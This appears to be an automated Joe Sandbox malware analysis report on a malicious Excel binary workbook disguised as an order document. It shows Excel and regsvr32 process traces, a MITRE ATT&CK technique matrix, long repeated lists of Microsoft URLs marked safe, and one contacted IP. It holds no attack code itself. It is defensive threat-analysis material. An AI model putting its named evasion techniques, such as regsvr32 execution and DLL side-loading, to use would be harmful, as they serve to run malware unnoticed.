    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: regsvr32.exe, 00000007.00000002.712988411.0000000003690000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000007.00000002.712988411.0000000003690000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000007.00000002.712988411.0000000003690000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000007.00000002.712988411.0000000003690000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1DLL Side-Loading1Process Injection1Regsvr321OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution21Boot or Logon Initialization ScriptsDLL Side-Loading1Masquerading1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
      high
      https://login.microsoftonline.com/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
        high
        https://shell.suite.office.com:14431815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
            high
            https://autodiscover-s.outlook.com/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                high
                https://cdn.entity.1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkey1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                      high
                      https://powerlift.acompli.net1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v11815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                        high
                        https://cortana.ai1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                  high
                                  https://api.aadrm.com/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                        high
                                        https://cr.office.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                            high
                                            https://graph.ppe.windows.net1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                            high
                                                            https://graph.windows.net1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                high
                                                                                                https://api.office.net1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v21815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.ai1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://loki.delve.office.com/api/v1/configuration/officewin32/1815CD0B-2738-4D28-B541-12A8E74F2E4F.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    185.180.199.121
                                                                                                                                                    unknownNetherlands
                                                                                                                                                    14576HOSTING-SOLUTIONSUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                    Analysis ID:439079
                                                                                                                                                    Start date:23.06.2021
                                                                                                                                                    Start time:17:14:26
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 13s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:light
                                                                                                                                                    Sample file name:Total_order_details_1231333.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:19
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal64.expl.evad.winXLSB@3/9@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 104.43.139.144, 20.82.210.154, 204.79.197.200, 13.107.21.200, 13.88.21.125, 23.211.6.115, 52.255.188.83, 52.109.88.177, 52.109.88.40, 52.109.88.38, 104.43.193.48, 20.54.104.15, 20.54.7.98, 40.112.88.60, 205.185.216.42, 205.185.216.10, 20.50.102.62, 80.67.82.211, 80.67.82.235
